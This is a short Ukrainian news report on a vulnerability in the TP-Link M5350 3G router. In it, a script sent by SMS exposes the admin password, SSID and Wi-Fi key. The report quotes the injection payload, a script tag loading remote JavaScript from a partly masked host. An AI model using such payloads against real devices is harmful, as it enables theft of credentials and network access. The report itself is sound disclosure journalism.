Вразливість в маршрутизаторі TP-Link дозволяє отримати пароль по СМС

Спеціаліст з Німеччини Ян Херш (Jan Hörsch) повідомив про вразливість в маршрутизаторах виробництва китайської компанії TP-Link, яка дозволяє отримати пароль до пристрою шляхом відправки SMS-повідомлення зі спеціальним скриптом на SIM-карту маршрутизатора.

Проблема зачіпає бездротовий мобільний 3G-маршрутизатор TP-Link M5350. Як пояснив дослідник, в бесіді з журналістом BleepingComputer, оператори зв’язку часто пропонують дану модель своїм клієнтам поряд з SIM-картою, що вставляється в маршрутизатор. Ця SIM-карта дозволяє маршрутизатору підключатися до мережі оператора і так само, як будь-яка інша “сімка” має свій номер.

В ході аналізу прошивки машрутизатора Херш виявив вразливість в функції обробки вхідних SMS-повідомлень. Він з’ясував, що шляхом відправки повідомлення зі скриптом < script src =//n.ms***/a.js> </ script> можна отримати пароль до облікового запису адміністратора, ідентифікатор бездротової мережі (SSID) і пароль від мережі Wi-Fi.

За словами фахівця, загроза не настільки небезпечна, як здається на перший погляд, оскільки для експлуатації вразливості зловмисникові потрібно знати номер SIM-карти маршрутизатора.